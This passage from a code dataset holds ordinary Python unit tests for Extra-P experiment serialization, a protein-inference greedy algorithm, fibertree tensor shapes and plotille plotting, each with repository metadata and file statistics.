| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43f172838ed14b0fa0dc562492d5b047740930f8
| 7,811
|
py
|
Python
|
tests/test_serialization.py
|
arima0714/extrap
|
ac535fa9a4d10ecb59a29f063ff0515b6a98517f
|
[
"BSD-3-Clause"
] | 13
|
2020-11-12T21:50:09.000Z
|
2022-03-03T11:01:27.000Z
|
tests/test_serialization.py
|
arima0714/extrap
|
ac535fa9a4d10ecb59a29f063ff0515b6a98517f
|
[
"BSD-3-Clause"
] | 3
|
2020-12-04T12:49:37.000Z
|
2021-05-06T11:41:31.000Z
|
tests/test_serialization.py
|
arima0714/extrap
|
ac535fa9a4d10ecb59a29f063ff0515b6a98517f
|
[
"BSD-3-Clause"
] | 6
|
2021-01-14T16:06:47.000Z
|
2021-09-01T09:54:37.000Z
|
# This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p)
#
# Copyright (c) 2020, Technical University of Darmstadt, Germany
#
# This software may be modified and distributed under the terms of a BSD-style license.
# See the LICENSE file in the base directory for details.
import unittest
from marshmallow import ValidationError
from extrap.entities.experiment import ExperimentSchema, Experiment
from extrap.fileio.text_file_reader import read_text_file
from extrap.modelers.model_generator import ModelGenerator
class TestSingleParameter(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.experiment = read_text_file("data/text/one_parameter_1.txt")
schema = ExperimentSchema()
# print(json.dumps(schema.dump(cls.experiment), indent=1))
exp_str = schema.dumps(cls.experiment)
cls.reconstructed: Experiment = schema.loads(exp_str)
def test_setup(self):
self.setUpClass()
def test_parameters(self):
self.assertListEqual(self.experiment.parameters, self.reconstructed.parameters)
def test_measurements(self):
self.assertDictEqual(self.experiment.measurements, self.reconstructed.measurements)
def test_coordinates(self):
self.assertListEqual(self.experiment.coordinates, self.reconstructed.coordinates)
def test_callpaths(self):
self.assertListEqual(self.experiment.callpaths, self.reconstructed.callpaths)
def test_metrics(self):
self.assertListEqual(self.experiment.metrics, self.reconstructed.metrics)
def test_call_tree(self):
self.assertEqual(self.experiment.call_tree, self.reconstructed.call_tree)
def test_modelers(self):
self.assertListEqual(self.experiment.modelers, self.reconstructed.modelers)
def test_scaling(self):
self.assertEqual(self.experiment.scaling, self.reconstructed.scaling)
class TestSingleParameterAfterModeling(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.experiment = read_text_file("data/text/one_parameter_1.txt")
ModelGenerator(cls.experiment).model_all()
schema = ExperimentSchema()
# print(json.dumps(schema.dump(cls.experiment), indent=1))
exp_str = schema.dumps(cls.experiment)
cls.reconstructed: Experiment = schema.loads(exp_str)
def test_setup(self):
self.setUpClass()
def test_parameters(self):
self.assertListEqual(self.experiment.parameters, self.reconstructed.parameters)
pass
def test_measurements(self):
self.assertDictEqual(self.experiment.measurements, self.reconstructed.measurements)
def test_coordinates(self):
self.assertListEqual(self.experiment.coordinates, self.reconstructed.coordinates)
def test_callpaths(self):
self.assertListEqual(self.experiment.callpaths, self.reconstructed.callpaths)
def test_metrics(self):
self.assertListEqual(self.experiment.metrics, self.reconstructed.metrics)
def test_call_tree(self):
self.assertEqual(self.experiment.call_tree, self.reconstructed.call_tree)
def test_modelers(self):
self.assertListEqual(self.experiment.modelers, self.reconstructed.modelers)
def test_scaling(self):
self.assertEqual(self.experiment.scaling, self.reconstructed.scaling)
class TestSerialization(unittest.TestCase):
def test_validation(self):
experiment = read_text_file("data/text/one_parameter_1.txt")
schema = ExperimentSchema()
exp_data = schema.dump(experiment)
val_erros = schema.validate(exp_data)
self.assertDictEqual({}, val_erros)
def test_additional_keys_in_experiment(self):
experiment = read_text_file("data/text/one_parameter_1.txt")
schema = ExperimentSchema()
exp_data = schema.dump(experiment)
# print(json.dumps(exp_data, indent=1))
exp_data['TEST_ATTRIBUTE'] = 'TEST_ATTRIBUTE'
reconstructed: Experiment = schema.load(exp_data)
self.assertFalse(hasattr(reconstructed, 'TEST_ATTRIBUTE'))
def test_additional_keys_in_measurements(self):
experiment = read_text_file("data/text/one_parameter_1.txt")
schema = ExperimentSchema()
exp_data = schema.dump(experiment)
# print(json.dumps(exp_data, indent=1))
exp_data['measurements']['TEST_ATTRIBUTE'] = 'TEST_ATTRIBUTE'
self.assertRaises(ValidationError, schema.load, exp_data)
def test_additional_keys_in_measurement_obj(self):
experiment = read_text_file("data/text/one_parameter_1.txt")
schema = ExperimentSchema()
exp_data = schema.dump(experiment)
# print(json.dumps(exp_data, indent=1))
exp_data['measurements']['compute']['time'][0]['TEST_ATTRIBUTE'] = 'TEST_ATTRIBUTE'
reconstructed: Experiment = schema.load(exp_data)
self.assertFalse(hasattr(reconstructed, 'TEST_ATTRIBUTE'))
class TestMultiParameter(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.experiment = read_text_file("data/text/two_parameter_3.txt")
schema = ExperimentSchema()
# print(json.dumps(schema.dump(cls.experiment), indent=1))
exp_str = schema.dumps(cls.experiment)
cls.reconstructed: Experiment = schema.loads(exp_str)
def test_setup(self):
self.setUpClass()
def test_parameters(self):
self.assertListEqual(self.experiment.parameters, self.reconstructed.parameters)
def test_measurements(self):
self.assertDictEqual(self.experiment.measurements, self.reconstructed.measurements)
def test_coordinates(self):
self.assertListEqual(self.experiment.coordinates, self.reconstructed.coordinates)
def test_callpaths(self):
self.assertListEqual(self.experiment.callpaths, self.reconstructed.callpaths)
def test_metrics(self):
self.assertListEqual(self.experiment.metrics, self.reconstructed.metrics)
def test_call_tree(self):
self.assertEqual(self.experiment.call_tree, self.reconstructed.call_tree)
def test_modelers(self):
self.assertListEqual(self.experiment.modelers, self.reconstructed.modelers)
def test_scaling(self):
self.assertEqual(self.experiment.scaling, self.reconstructed.scaling)
class TestMultiParameterAfterModeling(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.experiment = read_text_file("data/text/two_parameter_3.txt")
ModelGenerator(cls.experiment).model_all()
schema = ExperimentSchema()
# print(json.dumps(schema.dump(cls.experiment), indent=1))
exp_str = schema.dumps(cls.experiment)
cls.reconstructed: Experiment = schema.loads(exp_str)
def test_setup(self):
self.setUpClass()
def test_parameters(self):
self.assertListEqual(self.experiment.parameters, self.reconstructed.parameters)
pass
def test_measurements(self):
self.assertDictEqual(self.experiment.measurements, self.reconstructed.measurements)
def test_coordinates(self):
self.assertListEqual(self.experiment.coordinates, self.reconstructed.coordinates)
def test_callpaths(self):
self.assertListEqual(self.experiment.callpaths, self.reconstructed.callpaths)
def test_metrics(self):
self.assertListEqual(self.experiment.metrics, self.reconstructed.metrics)
def test_call_tree(self):
self.assertEqual(self.experiment.call_tree, self.reconstructed.call_tree)
def test_modelers(self):
self.assertListEqual(self.experiment.modelers, self.reconstructed.modelers)
def test_scaling(self):
self.assertEqual(self.experiment.scaling, self.reconstructed.scaling)
if __name__ == '__main__':
unittest.main()
| 37.7343
| 91
| 0.729868
| 875
| 7,811
| 6.354286
| 0.134857
| 0.05036
| 0.082734
| 0.097122
| 0.855935
| 0.843525
| 0.843525
| 0.843525
| 0.843525
| 0.843525
| 0
| 0.003082
| 0.169249
| 7,811
| 206
| 92
| 37.917476
| 0.853753
| 0.080784
| 0
| 0.84058
| 0
| 0
| 0.054005
| 0.032375
| 0
| 0
| 0
| 0
| 0.26087
| 1
| 0.318841
| false
| 0.014493
| 0.036232
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a1012db735efaaad877bc7ba0d5753c097909864
| 7,882
|
py
|
Python
|
tests/unit/greedy_algorithm_test.py
|
MassDynamics/protein-inference
|
05cc9738a3fcd074d8e6789bb24979a9837082cf
|
[
"MIT"
] | 4
|
2020-11-25T03:08:07.000Z
|
2020-11-25T23:28:06.000Z
|
tests/unit/greedy_algorithm_test.py
|
MassDynamics/protein-inference
|
05cc9738a3fcd074d8e6789bb24979a9837082cf
|
[
"MIT"
] | null | null | null |
tests/unit/greedy_algorithm_test.py
|
MassDynamics/protein-inference
|
05cc9738a3fcd074d8e6789bb24979a9837082cf
|
[
"MIT"
] | 1
|
2020-11-25T04:52:04.000Z
|
2020-11-25T04:52:04.000Z
|
import unittest
from protein_inference.problem_network import ProblemNetwork
from protein_inference.reprisal.greedy_algorithm import GreedyAlgorithm
import networkx as nx
from copy import deepcopy
class GreedyAlgorithmTest(unittest.TestCase):
def test_score_protein_basic(self):
g = nx.Graph()
g.add_nodes_from([1,2,3], protein = 0, allocated = 0, unique = 0 )
g.add_nodes_from([4,5], protein = 1)
g.add_edges_from([(1,4),(2,4),(2,5),(3,5)], score = 1)
pn = ProblemNetwork(g)
score = GreedyAlgorithm().score_protein(pn, 4)
self.assertEqual(score,2)
def test_score_protein_allocated(self):
g = nx.Graph()
g.add_nodes_from([1,2,3], protein = 0, allocated = 1, unique = 0 )
g.add_nodes_from([4,5], protein = 1)
g.add_edges_from([(1,4),(2,4),(2,5),(3,5)], score = 1)
pn = ProblemNetwork(g)
score = GreedyAlgorithm().score_protein(pn, 4)
self.assertEqual(score,0)
def test_score_all_proteins_basic(self):
g = nx.Graph()
g.add_nodes_from([1,2,3], protein = 0, allocated = 0, unique = 0 )
g.add_nodes_from([4,5], protein = 1)
g.add_edges_from([(1,4),(2,4),(2,5),(3,5)], score = 1)
pn = ProblemNetwork(g)
scores = GreedyAlgorithm().score_all_proteins(pn)
self.assertEqual(scores[4],2)
self.assertEqual(scores[5],2)
def test_score_all_proteins_asymmetric(self):
g = nx.Graph()
g.add_nodes_from([1,2,3], protein = 0, allocated = 0, unique = 0 )
g.add_nodes_from([4,5], protein = 1)
g.add_edges_from([(1,4),(2,5),(3,5)], score = 1)
pn = ProblemNetwork(g)
scores = GreedyAlgorithm().score_all_proteins(pn)
self.assertEqual(scores[4],1)
self.assertEqual(scores[5],2)
def test_score_all_proteins_allocated(self):
g = nx.Graph()
g.add_nodes_from([1,2,3], protein = 0, allocated = 1, unique = 0 )
g.add_nodes_from([4,5], protein = 1)
g.add_edges_from([(1,4),(2,4),(2,5),(3,5)], score = 1)
pn = ProblemNetwork(g)
scores = GreedyAlgorithm().score_all_proteins(pn)
self.assertEqual(scores[4],0)
self.assertEqual(scores[5],0)
def test_highest_scoring_proteins_basic(self):
g = nx.Graph()
g.add_nodes_from([1,2,3], protein = 0, allocated = 0, unique = 0 )
g.add_nodes_from([4,5], protein = 1)
g.add_edges_from([(1,4),(2,5),(3,5)], score = 1)
pn = ProblemNetwork(g)
protein = GreedyAlgorithm().get_highest_scoring_protein(pn)
self.assertEqual(protein,5)
def test_highest_scoring_proteins_tie(self):
g = nx.Graph()
g.add_nodes_from([1,2,3], protein = 0, allocated = 0, unique = 0 )
g.add_nodes_from([4,5], protein = 1)
g.add_edges_from([(1,4),(2,4),(2,5),(3,5)], score = 1)
pn = ProblemNetwork(g)
protein = GreedyAlgorithm().get_highest_scoring_protein(pn)
self.assertEqual(protein,4)
def test_highest_scoring_proteins_unique_only(self):
g = nx.Graph()
g.add_nodes_from([1], protein = 0, allocated = 0, unique = 1)
g.add_nodes_from([2], protein = 0, allocated = 0, unique = 0)
g.add_nodes_from([4], protein = 1, unique_evidence = True)
g.add_nodes_from([5], protein = 1, unique_evidence = False)
g.add_edges_from([(1,4),(2,4)], score = 1)
g.add_edges_from([(2,5)], score = 10) #check if we still choose 4
pn = ProblemNetwork(g)
protein = GreedyAlgorithm().get_highest_scoring_protein(pn, unique_only=True)
self.assertEqual(protein,4)
def test_run_scores(self):
g = nx.Graph()
g.add_nodes_from([1], protein = 0, allocated = 0, unique = 1)
g.add_nodes_from([2], protein = 0, allocated = 0, unique = 0)
g.add_nodes_from([4], protein = 1, unique_evidence = True)
g.add_nodes_from([5], protein = 1, unique_evidence = False)
g.add_edges_from([(1,4),(2,4)], score = 1)
g.add_edges_from([(2,5)], score = 10) #check if we still choose 4
pn = ProblemNetwork(g)
pn = GreedyAlgorithm().run(pn)
self.assertEqual(pn.network.nodes[4]["score"], 2)
self.assertEqual(pn.network.nodes[5]["score"], 0)
def test_run_protein_allocator(self):
g = nx.Graph()
g.add_nodes_from([1], protein = 0, allocated = 0, unique = 1)
g.add_nodes_from([2], protein = 0, allocated = 0, unique = 0)
g.add_nodes_from([4], protein = 1, unique_evidence = True)
g.add_nodes_from([5], protein = 1, unique_evidence = False)
g.add_edges_from([(1,4),(2,4)], score = 1)
g.add_edges_from([(2,5)], score = 10) #check if we still choose 4
pn = ProblemNetwork(g)
pn = GreedyAlgorithm().run(pn)
self.assertEqual(pn.network.nodes[4]["major"], 4)
self.assertEqual(pn.network.nodes[5]["major"], 4)
def test_run_peptide_allocator(self):
g = nx.Graph()
g.add_nodes_from([1], protein = 0, allocated = 0, unique = 1)
g.add_nodes_from([2], protein = 0, allocated = 0, unique = 0)
g.add_nodes_from([4], protein = 1, unique_evidence = True)
g.add_nodes_from([5], protein = 1, unique_evidence = False)
g.add_edges_from([(1,4),(2,4)], score = 1)
g.add_edges_from([(2,5)], score = 10) #check if we still choose 4
pn = ProblemNetwork(g)
pn = GreedyAlgorithm().run(pn)
self.assertEqual(pn.network.nodes[1]["allocated"], 4)
self.assertEqual(pn.network.nodes[2]["allocated"], 4)
def test_run_razor_tagging(self):
'''could possibly test this directly but it fits in well here'''
g = nx.Graph()
g.add_nodes_from([1], protein = 0, allocated = 0, unique = 1)
g.add_nodes_from([2], protein = 0, allocated = 0, unique = 0)
g.add_nodes_from([4], protein = 1, unique_evidence = True)
g.add_nodes_from([5], protein = 1, unique_evidence = False)
g.add_edges_from([(1,4),(2,4)], score = 1)
g.add_edges_from([(2,5)], score = 10) #check if we still choose 4
pn = ProblemNetwork(g)
pn = GreedyAlgorithm().run(pn)
self.assertEqual(pn.network.nodes[1]["razor"], True)
self.assertEqual(pn.network.nodes[2]["razor"], True)
def test_run_isomorphic(self):
g = nx.Graph()
g.add_nodes_from([1], protein = 0, allocated = 0, unique = 1)
g.add_nodes_from([2], protein = 0, allocated = 0, unique = 0)
g.add_nodes_from([4], protein = 1, unique_evidence = True)
g.add_nodes_from([5], protein = 1, unique_evidence = False)
g.add_edges_from([(1,4),(2,4)], score = 1)
g.add_edges_from([(2,5)], score = 10) #check if we still choose 4
pn = ProblemNetwork(g)
pn2 = deepcopy(pn)
pn = GreedyAlgorithm().run(pn)
pn2 = GreedyAlgorithm().run(pn2)
self.assertTrue(nx.is_isomorphic(pn.network,pn2.network))
def test_run_systemwide(self):
g = nx.Graph()
g.add_nodes_from([1], protein = 0, allocated = 0, unique = 1)
g.add_nodes_from([2], protein = 0, allocated = 0, unique = 0)
g.add_nodes_from([4], protein = 1, unique_evidence = True)
g.add_nodes_from([5], protein = 1, unique_evidence = False)
g.add_edges_from([(1,4),(2,4)], score = 1)
g.add_edges_from([(2,5)], score = 10) #check if we still choose 4
pn = ProblemNetwork(g)
pn2 = deepcopy(pn)
pns = GreedyAlgorithm().run_system_wide([pn,pn2])
pn1_non_par = GreedyAlgorithm().run(pn)
pn2_non_par = GreedyAlgorithm().run(pn2)
self.assertTrue(nx.is_isomorphic(pns[0].network, pn1_non_par.network))
self.assertTrue(nx.is_isomorphic(pns[1].network, pn2_non_par.network))
| 36.831776
| 85
| 0.606826
| 1,165
| 7,882
| 3.91588
| 0.072961
| 0.055239
| 0.082858
| 0.119684
| 0.846778
| 0.827707
| 0.785182
| 0.785182
| 0.7637
| 0.7637
| 0
| 0.053828
| 0.241056
| 7,882
| 214
| 86
| 36.831776
| 0.708793
| 0.030576
| 0
| 0.717105
| 0
| 0
| 0.006291
| 0
| 0
| 0
| 0
| 0
| 0.144737
| 1
| 0.092105
| false
| 0
| 0.032895
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a105ee947b8c2ba5a97bbf9ab2c69471b96bcd37
| 9,487
|
py
|
Python
|
test/test_tensor_shape.py
|
Fibertree-Project/fibertree
|
6fbb1971c31fcc9b27e09591a1ee2d66ae0e7b76
|
[
"MIT"
] | 2
|
2021-02-03T20:34:14.000Z
|
2021-02-04T06:36:51.000Z
|
test/test_tensor_shape.py
|
FPSG-UIUC/fibertree
|
6fbb1971c31fcc9b27e09591a1ee2d66ae0e7b76
|
[
"MIT"
] | 1
|
2021-06-19T02:59:01.000Z
|
2021-06-23T13:20:11.000Z
|
test/test_tensor_shape.py
|
FPSG-UIUC/fibertree
|
6fbb1971c31fcc9b27e09591a1ee2d66ae0e7b76
|
[
"MIT"
] | 1
|
2021-06-16T15:03:33.000Z
|
2021-06-16T15:03:33.000Z
|
"""Tests related to shape of a tensor"""
import unittest
from fibertree import Payload
from fibertree import Fiber
from fibertree import Rank
from fibertree import Tensor
class TestTensorShape(unittest.TestCase):
def test_shape_empty(self):
"""Test shape of empty tensor"""
t1 = Tensor(rank_ids=["M", "K"])
self.assertEqual(t1.getRankIds(), ["M", "K"])
self.assertEqual(t1.getShape(), [0, 0])
t2 = Tensor(rank_ids=["M", "K"], shape=[10,20])
self.assertEqual(t2.getRankIds(), ["M", "K"])
self.assertEqual(t2.getShape(), [10, 20])
def test_shape_0D(self):
"""Test shpe of 0-D tensor"""
t = Tensor(rank_ids=[])
p = t.getRoot()
p += 1
self.assertEqual(t.getRankIds(), [])
self.assertEqual(t.getShape(), [])
def test_shape_new(self):
"""Test shape of a tensor from a file"""
t1 = Tensor.fromYAMLfile("./data/test_tensor-1.yaml")
self.assertEqual(t1.getRankIds(), ["M", "K"])
self.assertEqual(t1.getShape(), [7, 4])
# Note: We cannot override the shape of shape from a YAML file
def test_shape_fromUncompressed_1D(self):
"""Test shape of a tensor from 1D nested lists"""
l1 = [ 100, 101, 0, 102 ]
t1 = Tensor.fromUncompressed(["M"], l1)
self.assertEqual(t1.getRankIds(), ["M"])
self.assertEqual(t1.getShape(), [ 4 ])
l2 = [ 100, 101, 0, 0 ]
t2 = Tensor.fromUncompressed(["M"], l2)
self.assertEqual(t2.getRankIds(), ["M"])
self.assertEqual(t2.getShape(), [ 4 ])
def test_shape_fromUncompressed_2D_A1(self):
"""Test shape of a tensor from 2D nested lists (tensor A)"""
# 0 1 2 3
#
l1 = [ [ 0, 0, 0, 0 ], # 0
[ 100, 101, 102, 0 ], # 1
[ 0, 201, 0, 203 ], # 2
[ 0, 0, 0, 0 ], # 3
[ 400, 0, 402, 0 ], # 4
[ 0, 0, 0, 0 ], # 5
[ 0, 601, 0, 603 ] ] # 6
t1 = Tensor.fromUncompressed(["M", "K"], l1)
with self.subTest(test="All ranks"):
self.assertEqual(t1.getRankIds(), ["M", "K"])
self.assertEqual(t1.getShape(), [ 7, 4 ])
with self.subTest(test="All ranks specified"):
self.assertEqual(t1.getShape(["M", "K"]), [7, 4])
with self.subTest(test="Just rank 'M' as list"):
self.assertEqual(t1.getShape(["M"]), [7])
with self.subTest(test="Just rank 'K' as list"):
self.assertEqual(t1.getShape(["K"]), [4])
with self.subTest(test="Just rank 'M'"):
self.assertEqual(t1.getShape("M"), 7)
with self.subTest(test="Just rank 'K'"):
self.assertEqual(t1.getShape("K"), 4)
with self.subTest(test="Check authoritative"):
self.assertEqual(t1.getShape(authoritative=True), [7, 4])
self.assertEqual(t1.getShape(["M", "K"], authoritative=True), [7, 4])
self.assertEqual(t1.getShape(["M"], authoritative=True), [7])
self.assertEqual(t1.getShape(["K"], authoritative=True), [4])
self.assertEqual(t1.getShape("M", authoritative=True), 7)
self.assertEqual(t1.getShape("K", authoritative=True), 4)
def test_shape_fromUncompressed_2D_A2(self):
"""Test shape of a tensor from 2D nested lists (tensor A, multiletter ranks_ids)"""
# 0 1 2 3
#
l1 = [ [ 0, 0, 0, 0 ], # 0
[ 100, 101, 102, 0 ], # 1
[ 0, 201, 0, 203 ], # 2
[ 0, 0, 0, 0 ], # 3
[ 400, 0, 402, 0 ], # 4
[ 0, 0, 0, 0 ], # 5
[ 0, 601, 0, 603 ] ] # 6
t1 = Tensor.fromUncompressed(["MA", "KA"], l1)
with self.subTest(test="All ranks"):
self.assertEqual(t1.getRankIds(), ["MA", "KA"])
self.assertEqual(t1.getShape(), [ 7, 4 ])
with self.subTest(test="All ranks specified"):
self.assertEqual(t1.getShape(["MA", "KA"]), [7, 4])
with self.subTest(test="Just rank 'MA' as list"):
self.assertEqual(t1.getShape(["MA"]), [7])
with self.subTest(test="Just rank 'KA' as list"):
self.assertEqual(t1.getShape(["KA"]), [4])
with self.subTest(test="Just rank 'MA'"):
self.assertEqual(t1.getShape("MA"), 7)
with self.subTest(test="Just rank 'KA'"):
self.assertEqual(t1.getShape("KA"), 4)
with self.subTest(test="Check authoritative"):
self.assertEqual(t1.getShape(authoritative=True), [7, 4])
self.assertEqual(t1.getShape(["MA", "KA"], authoritative=True), [7, 4])
self.assertEqual(t1.getShape(["MA"], authoritative=True), [7])
self.assertEqual(t1.getShape(["KA"], authoritative=True), [4])
self.assertEqual(t1.getShape("MA", authoritative=True), 7)
self.assertEqual(t1.getShape("KA", authoritative=True), 4)
def test_shape_fromUncompressed_2D_B(self):
"""Test shape of a tensor from 2D nested lists (tensor B)"""
# 0 1 2 3
#
l2 = [ [ 0, 0, 0, 0 ], # 0
[ 100, 101, 102, 0 ], # 1
[ 0, 201, 0, 0 ], # 2
[ 0, 0, 0, 0 ], # 3
[ 400, 0, 402, 0 ], # 4
[ 0, 0, 0, 0 ], # 5
[ 0, 601, 0, 0 ] ] # 6
t2 = Tensor.fromUncompressed(["M", "K"], l2)
self.assertEqual(t2.getRankIds(), ["M", "K"])
self.assertEqual(t2.getShape(), [7, 4])
def test_shape_fromFiber(self):
"""Test shape of a tensor from a fiber without authoritative shape"""
y1 = Tensor.fromYAMLfile("./data/test_tensor-1.yaml")
f1 = y1.getRoot()
t1 = Tensor.fromFiber(["M", "K"], f1)
with self.subTest(test="All ranks"):
self.assertEqual(t1.getRankIds(), ["M", "K"])
self.assertEqual(t1.getShape(), [7, 4])
with self.subTest(test="All ranks specified"):
self.assertEqual(t1.getShape(["M", "K"]), [7, 4])
with self.subTest(test="Just rank 'M' as list"):
self.assertEqual(t1.getShape(["M"]), [7])
with self.subTest(test="Just rank 'K' as list"):
self.assertEqual(t1.getShape(["K"]), [4])
with self.subTest(test="Just rank 'M'"):
self.assertEqual(t1.getShape("M"), 7)
with self.subTest(test="Just rank 'K'"):
self.assertEqual(t1.getShape("K"), 4)
with self.subTest(test="Check authoritative"):
self.assertIsNone(t1.getShape(authoritative=True))
self.assertIsNone(t1.getShape(["M", "K"], authoritative=True))
self.assertIsNone(t1.getShape(["M"], authoritative=True))
self.assertIsNone(t1.getShape(["K"], authoritative=True))
self.assertIsNone(t1.getShape("M", authoritative=True))
self.assertIsNone(t1.getShape("K", authoritative=True))
def test_shape_fromFiber_authoritative(self):
"""Test shape of a tensor from a fiber with authoritative shape"""
y1 = Tensor.fromYAMLfile("./data/test_tensor-1.yaml")
f1 = y1.getRoot()
t1 = Tensor.fromFiber(["M", "K"], f1, [100,200])
with self.subTest(test="All ranks"):
self.assertEqual(t1.getRankIds(), ["M", "K"])
self.assertEqual(t1.getShape(), [100, 200])
with self.subTest(test="All ranks specified"):
self.assertEqual(t1.getShape(["M", "K"]), [100, 200])
with self.subTest(test="Just rank 'M'"):
self.assertEqual(t1.getShape(["M"]), [100])
with self.subTest(test="Just rank 'K'"):
self.assertEqual(t1.getShape(["K"]), [200])
with self.subTest(test="Just rank 'M'"):
self.assertEqual(t1.getShape("M"), 100)
with self.subTest(test="Just rank 'K'"):
self.assertEqual(t1.getShape("K"), 200)
with self.subTest(test="Check authoritative"):
self.assertEqual(t1.getShape(authoritative=True), [100, 200])
self.assertEqual(t1.getShape(["M", "K"], authoritative=True), [100, 200])
self.assertEqual(t1.getShape(["M"], authoritative=True), [100])
self.assertEqual(t1.getShape(["K"], authoritative=True), [200])
self.assertEqual(t1.getShape("M", authoritative=True), 100)
self.assertEqual(t1.getShape("K", authoritative=True), 200)
def test_rankid_2D(self):
"""Test setting rank ids of 2D tensor"""
# 0 1 2 3
#
l1 = [ [ 0, 0, 0, 0 ], # 0
[ 100, 101, 102, 0 ], # 1
[ 0, 201, 0, 203 ], # 2
[ 0, 0, 0, 0 ], # 3
[ 400, 0, 402, 0 ], # 4
[ 0, 0, 0, 0 ], # 5
[ 0, 601, 0, 603 ] ] # 6
rank_ids = ["M", "K"]
t1 = Tensor.fromUncompressed(rank_ids, l1)
rank_ids2 = t1.getRankIds()
self.assertEqual(rank_ids2, rank_ids)
rank_ids_new = ["M2", "M1"]
t1.setRankIds(rank_ids_new)
rank_ids3 = t1.getRankIds()
self.assertEqual(rank_ids3, rank_ids_new)
if __name__ == '__main__':
unittest.main()
| 34.624088
| 91
| 0.521029
| 1,148
| 9,487
| 4.256969
| 0.090592
| 0.190301
| 0.180888
| 0.230203
| 0.814406
| 0.784326
| 0.767137
| 0.745242
| 0.716186
| 0.684469
| 0
| 0.072688
| 0.312638
| 9,487
| 273
| 92
| 34.750916
| 0.676737
| 0.076947
| 0
| 0.45509
| 0
| 0
| 0.073292
| 0.008657
| 0
| 0
| 0
| 0
| 0.407186
| 1
| 0.05988
| false
| 0
| 0.02994
| 0
| 0.095808
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a1a665dfb175b6e31d5f3ea6b61795b89b98ba6a
| 16,614
|
py
|
Python
|
tests/test_plot.py
|
sswingle/plotille
|
9b00815b129d46613f86befa93f798397ca087c0
|
[
"MIT"
] | 157
|
2017-09-28T12:16:52.000Z
|
2022-03-31T08:13:23.000Z
|
tests/test_plot.py
|
sswingle/plotille
|
9b00815b129d46613f86befa93f798397ca087c0
|
[
"MIT"
] | 43
|
2017-11-01T19:21:21.000Z
|
2022-03-27T08:36:56.000Z
|
tests/test_plot.py
|
sswingle/plotille
|
9b00815b129d46613f86befa93f798397ca087c0
|
[
"MIT"
] | 12
|
2018-01-14T08:05:07.000Z
|
2021-07-31T05:15:38.000Z
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from plotille import plot
def test_constant_y():
expected = """ (Y) ^
0.55000000 |
0.54750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
